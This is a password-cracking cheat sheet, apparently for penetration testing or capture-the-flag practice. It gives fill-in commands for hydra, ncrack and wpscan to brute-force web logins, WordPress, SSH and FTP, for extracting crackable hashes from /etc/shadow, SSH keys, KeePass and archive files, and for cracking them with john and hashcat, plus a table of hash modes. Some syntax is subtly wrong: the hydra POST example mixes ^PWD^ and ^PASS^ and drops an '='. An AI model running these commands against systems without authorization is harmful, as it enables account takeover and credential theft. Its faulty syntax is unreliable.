Crack Password Cheat Sheet | How to crack and brute force passwords

Cracking password protected PDF files
$ pdfcrack -f <pdf file> -w <wordlist>

Cracking Web-Application Passwords
Get Request:
$ hydra -L <usernames list> -P <passwords list> <target ip> http-get <path to admin panel>
Post Request:
$ hydra -L <usernames list> -P <passwords list> <target ip> http-form-post "<Login Page>:<Request Body with ^USER^ and ^PWD^>:<Error Message>"
e.g: hydra -L <usernames list> -P <passwords list> <target ip> http-form-post "/dvwa/login.php:username=^USER^&password^PASS^:<Error Message>"

Wordpress:
$ wpscan --url <target ip/wp-login> -U <usernames list> -P <passwords list>

Cracking SSH Passwords
$ hydra -L <username list> -P <passwords list> 10.10.10.180 ssh 
$ ncrack -U <usernames list> -P <passwords list> ssh://10.10.10.180 
Cracking FTP Passwords 
$ hydra -L <usernames list> -P <passwords list> 10.10.10.180 ftp 
$ ncrack -U <usernames list> -P <passwords list> ftp://10.10.10.180
Cracking Passwords when Service uses non-standard port
$ hydra -L <username list> -P <passwords list> -s <port> 10.10.10.180 ssh 
$ ncrack -U <usernames list> -P <passwords list> 10.10.10.180:<port> 


Identifying Hash Types: 
$ hashid <file containing hashes> 
$ hashid -m <file containing hashes> # Shows hashcat mode 
$ hashid -j <file containing hashes> # Shows john format 

Converting encrypted files into a format supported by John: 
$ unshadow <etc_passwd file> <etc_shadow_file> > unshadowed.file 
$ ssh2john.py <encrypted SSH key file> > SSHkey.john 
$ keepass2john <kdb file> > keepass_hash.john 
$ rar2john <encrypted rar file> > rar file hash.john 
$ 7z2john <ecnrypted 7z file> > 7zfilehash.john 

Cracking Hashes Using John The Ripper: 
$ john --list=formats # outputs all supported format 
$ john <hash file> --wordlist=<path to wordlist> 
$ john <hash file> --show (shows cracked hashes) 
$ john <hash file> --wordlist=<path to wordlist> --format=<hash format> 
$ john <hash file> --incremental # uses ASCII incremental mode 
$ john <hash file> --incremental=digits # uses digit incremental
# mode : 0 to 99999999999999999999 



Craching Hashes Using HashCat: 
$ hashcat -m <hash type mode> -a <attack mode> <hash file> <path to wordlist> 

HashCat Attack Modes (-a):
0 : Straight 
1 : Combination 
3 : Brute-force 

HashCat Hash Types (-m): 
Linux OS Hashes:
500 : MD5 ($1$)
3200 : Blowfish ($2$)
7400 : SHA256 ($5)
1800 : SHA512 ($6$)

Windows OS Hashes:
1000 : NTLM 
3000 : LM 

MacOS Hashes:
122 : MacOS v10.4,10.5,10.6 
1722 : MacOS v10.7 
7100 : MacOS v10.8+ 

Application hashes 
900 : MD4 
0 : MD5 
100 : SHAl 
1400 : SHA2-256 
1700 : SHA2-512 
17400 : SHA3-256 
17600 : SHA3-512 

Network Protocol Hashes: 
7500 : Kerberos 5 
10200 : CRAM-MD5 
11100 : PostGreSQL CRAM (MD5)
11200 : MySQL CRAM (SHA1) 
16500 : Json Web Token 

Salted Hashes:
10 : MD5 ($pass.$salt)
20 : MD5 ($salt.$pass) 
110 : SHAl ($pass.$salt) 
1410 : SHA256 ($pass.$salt) 
1420 : SHA256 ($salt$pass)
1710 : SHA512 ($pass.$salt) 
1720 : SHA512 ($salt.$pass)